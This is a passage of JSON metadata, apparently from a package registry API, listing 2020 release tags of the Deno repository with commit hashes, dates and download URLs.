ag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5/manifests"},{"name":"std/0.74.0","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.74.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0/manifests"},{"name":"v1.4.4","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4/manifests"},{"name":"std/0.73.0","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.73.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0/manifests"},{"name":"v1.4.3","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3/manifests"},{"name":"std/0.72.0","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.72.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0/manifests"},{"name":"v1.4.2","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2/manifests"},{"name":"std/0.71.0","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.71.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0/manifests"},{"name":"v1.4.1","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:40:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1/manifests"},{"name":"std/0.70.0","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:38:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.70.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0/manifests"},{"name":"v1.4.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0/manifests"},{"name":"std/0.69.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.69.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0/manifests"},{"name":"v1.3.3","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3/manifests"},{"name":"std/0.68.0","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.68.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0/manifests"},{"name":"v1.3.2","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2/manifests"},{"name":"std/0.67.0","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.67.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0/manifests"},{"name":"v1.3.1","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1/manifests"},{"name":"std/0.66.0","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.66.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0/manifests"},{"name":"v1.3.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0/manifests"},{"name":"std/0.65.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.65.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0/manifests"},{"name":"v1.2.3","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3/manifests"},{"name":"std/0.64.0","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.64.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0/manifests"},{"name":"v1.2.2","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2/manifests"},{"name":"std/0.63.0","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.63.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0/manifests"},{"name":"v1.2.1","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1/manifests"},{"name":"std/0.62.0","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.62.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0/manifests"},{"name":"v1.2.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0/manifests"},{"name":"std/0.61.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.61.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0/manifests"},{"name":"v1.1.3","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3/manifests"},{"name":"std/0.60.0","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.60.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0/manifests"},{"name":"v1.1.2","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2/manifests"},{"name":"std/0.59.0","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.59.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0/manifests"},{"name":"v1.1.1","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1/manifests"},{"name":"std/0.58.0","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.58.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0/manifests"},{"name":"v1.1.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0/manifests"},{"name":"std/0.57.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.57.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0/manifests"},{"name":"v1.0.5","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5/manifests"},{"name":"std/0.56.0","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.56.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0/manifests"},{"name":"v1.0.4","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4/manifests"},{"name":"std/0.55.0","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.55.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0/manifests"},{"name":"v1.0.3","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3/manifests"},{"name":"std/0.54.0","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.54.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0/manifests"},{"name":"std/0.53.0","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.53.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0/manifests"},{"name":"v1.0.2","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2/manifests"},{"name":"v1.0.1","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1/manifests"},{"name":"std/0.52.0","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.52.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0/manifests"},{"name":"std/0.51.0","sha":"c474d383543708fc636c06dd2e4a9100495f45c5","kind":"commit","published_at":"2020-05-14T11:45:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.51.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fd